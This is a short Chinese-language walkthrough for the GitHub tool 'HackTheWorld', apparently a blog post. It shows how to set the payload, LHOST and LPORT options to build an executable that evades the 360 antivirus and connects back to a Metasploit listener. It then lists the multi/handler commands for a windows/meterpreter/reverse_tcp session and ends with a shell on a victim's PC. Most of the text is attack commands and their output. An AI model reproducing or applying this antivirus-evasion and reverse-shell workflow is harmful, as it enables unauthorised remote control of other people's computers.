Github - HackTheWorld - Use

https://github.com/stormshadow07/HackTheWorld

图片

set Payload :设置生成的Payload

set LHOST : Metasploit监听的服务器IP

set LPORT : Metasploit监听的端口

set Shellcode :设置为bypassing

设置完后,会在/result/目录下有一个final_54321.exe:

1
2
3
4
5
6
7
8
9
==================================== RESULT ====================================

[+] Adding Manifest
Microsoft (R) Manifest Tool
Copyright (c) Microsoft Corporation.
All rights reserved.
0009:err:ole:CoGetClassObject class {e5cb7a31-7512-11d2-89ce-0080c792e5d8} not registered
0009:err:ole:CoGetClassObject no class object {e5cb7a31-7512-11d2-89ce-0080c792e5d8} could be created for context 0x1
[+] Final File with Manifest [./result/final_54321.exe]

绕过360反弹回话到Metasploit

1
2
3
4
使用exploit监听
use exploit/multi/handler
设置payload
set payload windows/meterpreter/reverse_tcp

图片

exploit:

图片

1
2
meterpreter > getuid 
Server username: liuwx-PC\liuwx